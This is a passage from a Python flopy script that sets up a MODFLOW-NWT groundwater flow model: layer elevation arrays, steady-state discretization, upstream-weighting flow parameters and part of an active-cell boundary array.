0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.37E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.72E+02, 2.75E+02, 2.79E+02, 2.79E+02, 2.79E+02, 2.81E+02, 2.88E+02, 2.88E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.935360E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.32E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.43E+02, 2.43E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.53E+02, 2.59E+02, 2.63E+02, 2.63E+02, 2.67E+02, 2.72E+02, 2.75E+02, 2.75E+02, 2.79E+02, 2.79E+02, 2.79E+02, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.937070E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.31E+02, 2.35E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.67E+02, 2.72E+02, 2.73E+02, 2.75E+02, 2.75E+02, 2.75E+02, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.938565E+02, 1.94E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.25E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.53E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.67E+02, 2.68E+02, 2.72E+02, 2.73E+02, 2.73E+02, 2.73E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.96E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.19E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.51E+02, 2.53E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.67E+02, 2.67E+02, 2.69E+02, 2.72E+02, 2.72E+02, 0, 0,
0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.19E+02, 2.21E+02, 2.22E+02, 2.24E+02, 2.25E+02, 2.28E+02, 2.28E+02, 2.31E+02, 2.32E+02, 2.35E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.63E+02, 2.67E+02, 2.67E+02, 0, 0, 0, 0,
1.930262E+02, 1.930813E+02, 1.931463E+02, 1.932345E+02, 1.933725E+02, 1.938515E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.18E+02, 2.21E+02, 2.22E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.63E+02, 0, 0, 0, 0, 0,
1.930745E+02, 1.932300E+02, 1.934108E+02, 1.936452E+02, 1.939805E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.22E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.32E+02, 2.35E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.51E+02, 2.54E+02, 2.59E+02, 2.59E+02, 0, 0, 0, 0, 0, 0,
1.931133E+02, 1.933483E+02, 1.936155E+02, 1.939447E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.28E+02, 2.28E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.50E+02, 2.58E+02, 0, 0, 0, 0, 0, 0, 0,
1.931405E+02, 1.934308E+02, 1.937560E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.32E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.43E+02, 2.46E+02, 2.46E+02, 2.48E+02, 2.48E+02, 0, 0, 0, 0, 0, 0, 0, 0,
1.931537E+02, 1.934730E+02, 1.938313E+02, 1.94E+02, 1.947535E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.22E+02, 2.23E+02, 2.25E+02, 2.25E+02, 2.28E+02, 2.28E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.43E+02, 2.43E+02, 2.46E+02, 2.46E+02, 0, 0, 0, 0, 0, 0, 0, 0,
1.931505E+02, 1.934700E+02, 1.938398E+02, 1.94E+02, 1.947937E+02, 1.95E+02, 1.96E+02, 1.968170E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.41E+02, 2.43E+02, 2.43E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1.931243E+02, 1.934108E+02, 1.937765E+02, 1.94E+02, 1.947485E+02, 1.95E+02, 1.96E+02, 1.967558E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.41E+02, 2.41E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1.93E+02, 1.932635E+02, 1.936290E+02, 1.94E+02, 1.946230E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.39E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1.93E+02, 1.933783E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.957018E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.35E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1.93E+02, 1.935405E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.32E+02, 2.34E+02, 2.34E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1.932890E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.31E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1.93E+02, 1.935508E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.30E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1.932863E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.27E+02, 2.28E+02, 2.28E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1.93E+02, 1.935100E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.27E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1.932413E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.24E+02, 2.25E+02, 2.25E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1.93E+02, 1.933477E+02, 1.94E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.24E+02, 2.24E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1.93E+02, 1.932182E+02, 1.933268E+02, 1.94E+02, 1.94E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.23E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.93E+02, 1.93E+02, 1.93E+02, 1.93E+02, 1.93E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.21E+02, 2.22E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.96E+02, 1.98E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.21E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.19E+02, 2.20E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.17E+02, 2.18E+02, 2.18E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.936795E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.17E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.938033E+02, 1.94E+02, 1.96E+02, 1.97E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.16E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.938665E+02, 1.94E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.13E+02, 2.14E+02, 2.14E+02, 2.15E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.13E+02, 2.14E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.933480E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.107930E+02, 2.11E+02, 2.12E+02, 2.13E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
top1 = top1.reshape((nrow,ncol))
bot1 = np.ones(top1.shape) * 180.
bot2 = np.ones(top1.shape) * 160.
bot3 = np.ones(top1.shape) * 140.
botm = [bot1, bot2, bot3]
botm = np.array(botm)
# Stress periods
Steady = True
nstp = 1
tsmult = 1.
perlen = 86400.
# Create the discretization object
# itmuni = 4 (days); lenuni = 2 (meters)
dis = flopy.modflow.ModflowDis(mf, nlay, nrow, ncol, nper=1, delr=delr, delc=delc,
top=top1, botm=botm, laycbd=0, itmuni=4, lenuni=2,
steady=Steady, nstp=nstp, tsmult=tsmult, perlen=perlen)
## Instantiate upstream weighting (UPW) flow package for MODFLOW-NWT
# UPW parameters
# UPW must be instantiated after DIS. Otherwise, during the mf.write_input() procedures,
# flopy will crash.
# First line of UPW input is: IUPWCB HDRY NPUPW IPHDRY
hdry = -1.e+30
iphdry = 0
# Next variables are: LAYTYP, LAYAVG, CHANI, LAYVKA, LAYWET
laytyp = [1, 1, 1] # >0: convertible
layavg = 0 # 0: harmonic mean
chani = 1.0 # >0: CHANI is the horizontal anisotropy for the entire layer
layvka = 0 # =0: indicates VKA is vertical hydraulic conductivity
laywet = 0 # Always set equal to zero in UPW package
hk = 3.172E-03
# hani = 1 # Not needed because CHANI > 1
vka = 3.172E-04 # Is equal to vert. K b/c LAYVKA = 0
ss = 0.00001
sy = 0.30
upw = flopy.modflow.ModflowUpw(mf, laytyp=laytyp, layavg=layavg, chani=chani, layvka=layvka,
laywet=laywet, ipakcb=53, hdry=hdry, iphdry=iphdry, hk=hk,
vka=vka, ss=ss, sy=sy)
## Instantiate basic (BAS or BA6) package for MODFLOW-NWT
ibnd1 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
